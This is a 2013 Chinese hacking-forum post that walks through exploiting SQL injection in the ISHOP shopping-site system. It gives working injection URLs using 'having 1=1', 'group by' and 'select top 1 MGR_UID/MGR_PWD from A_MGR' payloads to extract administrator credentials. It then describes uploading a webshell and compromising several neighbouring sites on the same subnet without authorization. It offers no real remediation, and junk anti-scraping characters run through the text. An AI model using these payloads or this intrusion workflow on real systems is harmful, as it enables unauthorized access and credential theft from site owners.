中国网络渗透测试联盟

标题: ISHOP商场建站系统注入漏洞 [打印本页]

作者: admin    时间: 2013-4-4 17:40
标题: ISHOP商场建站系统注入漏洞
发现一个注入点. D+ \8 P7 h9 f  d' p' m
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389: Q" s6 U7 b8 i2 w+ j6 y
2 Z# w1 K, p# J" F' n
习惯性的加’having1=1--
/ Y% y0 y7 e8 s8 ?! c& r& g' c, m+ _" Z) T/ j  X. f% D' {, \
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
. M; q6 u2 c6 Q# m- w6 u7 {: f% W, q1 S2 f  }8 D
0; A9 h6 X, S* J0 q$ _1 J$ ?
9 m3 J7 q; j! T  D# o) O5 R
爆出Diary_A.dl_Title(这时候很激动啊)) F! t8 h1 j! J6 f# U  p% r+ l
' J) A' t, G% F& ~! p; V( Z) j! a
那么继续7 A2 b# [* [7 N% @
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
! V" z1 H# ^) c& F$ \* }1 Q  e5 [& I, H2 ^
继续,一直爆下去) b$ R6 ^+ a, Y  E( T* ^7 k, q: L6 {
4 O# U. u# X& R4 }1 @
爆到几个字段和表段 但是没找到需要的管理用户的字段' [, n5 M* ]( N: G. Z+ R+ [6 v) Z

  `# V* t, S: `6 {; X; D4 l4 `& c8 Y蛋疼了 怎么办 然后去后台登陆页看源码; ]) h& Y5 J9 }; V
9 R* F* o0 R* l3 ~
0" L7 d; I2 {' {0 A4 J' `5 z
2 U! s3 L+ |- ?  A- w2 v+ B
Input name= “ADUID”
$ f- m5 J0 X  o, e+ ]& _4 N, M. p' jInput name= “ADPWD”8 @9 J" ]! y; I9 ]. X- t; h

& u) g2 h) A9 g" J& I3 h8 F很幸运 找到了字段那就继续
* ?1 }# O$ s" c2 v, W# d4 z找到之后开始爆用户* A2 @" O. _1 w7 X# I
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
( T* _6 A) o. m; A$ L爆密码) X9 y5 @3 [* ~% N$ s7 p8 I. q
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
4 v2 Z6 B! R2 ^+ a2 C+ w5 ?测试了下 这个注入点只能爆到文章哪里的表 / F/ `+ F5 s2 W2 O2 B- e

5 }1 k$ Y% Z1 p0 l头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了: b2 Y: |' \8 x# \. V

1 x; t" X) V2 o3 `又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了2 d7 L( V/ d/ E, n. L
) |* @0 i8 Z- w2 u
473
& \4 C, w2 U0 s/ \1 P! g% o0 }4 G' h
2 R7 \& C; w1 ?( s/ z4 ?进后台
8 \# n! I8 y! E# o5 _6 g( t6 S
# I) w! L2 `2 e6 I1 X  X9 C4 W; x8 W  H; T( k0 m: R0 c" j$ H$ W
发现几个上传点 有的地方不能上传 而且防止恶意代码' l7 B5 q, Z0 |, Q( o# a
# J' D4 O' K9 \" L
没办法 各种百度各种找大牛 找到一只好像可以突破的马: \+ X* _' ^. i' Q2 m
; [' ~5 {5 `1 o! E- r7 N

4 Y; C7 W* V3 u' M. H1 F0 E在系统管理那里直接上传 不过没有显示地址
! O2 V6 V+ p1 l7 a4 H' j- U+ L* k5 B5 L4 M0 l
再上传一次 抓包 搞定OK
* z, u5 k/ N- y# w) m% q$ r
  A& R8 G1 v3 \* B9 X6 L. M' T
5 s( }# J- a4 ~% [2 c  x# O" s( F, g4 A3 o0 x$ M$ P8 s
472
- B" X' ?: H& ^* ~5 s2 f# c4 U5 f) D
3 Q( t" r4 A* e- e$ E晚上不行了 去睡觉。。。% w' }2 X5 Y4 f" I3 `6 u/ r
第二天刚起床 闲的没事做继续日站吧 - a/ E; P+ T: O4 T7 q, ^( t8 J

' S+ D: `2 _* X找个站 就把这个站的旁c扫了下2 t; ?; I/ W# O4 k+ E5 x4 W
/ e! P* D+ Z' E7 z3 G  E" M/ Y
发现c段也有一个购物站 ,然后还和这个站的模板差不多
: V& m6 D+ W( b$ Z) X% _; v5 ~9 O3 u# E3 I2 K
就找到会员登录口测试  I3 |6 D+ u% Y- D5 K4 v2 [0 s
2 K! a* p: N9 J  |$ A
'and (select top 1 MGR_UID from A_MGR)>0—4 \9 D& n0 S7 r. p. e* v6 t
果断爆到了 这时候我很激动 通杀
, @# f9 y! ^) G; P$ x4 o
& N9 X1 D) ?9 s* K再次翻c段
2 }4 u% P& U" Q; b& X, ^
$ L# W1 ?( r. z翻出几个站 都成功拿下' i' p( c9 k0 v" @

- U+ h: Z) [, c, w# ]: G+ _' {4 s3 ~0 H- u

8 S8 K: X; ^3 r1 V" x修复方案:
, a: E/ \, f( I5 d他们比我专业
& E2 a6 g( N! T& ^5 l. j. e
2 C9 a7 O& M1 j7 B7 G  {5 d, B. ?& a' p$ ]! I: j, j9 P

- b+ ~; B# Z5 h8 {0 c8 u




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2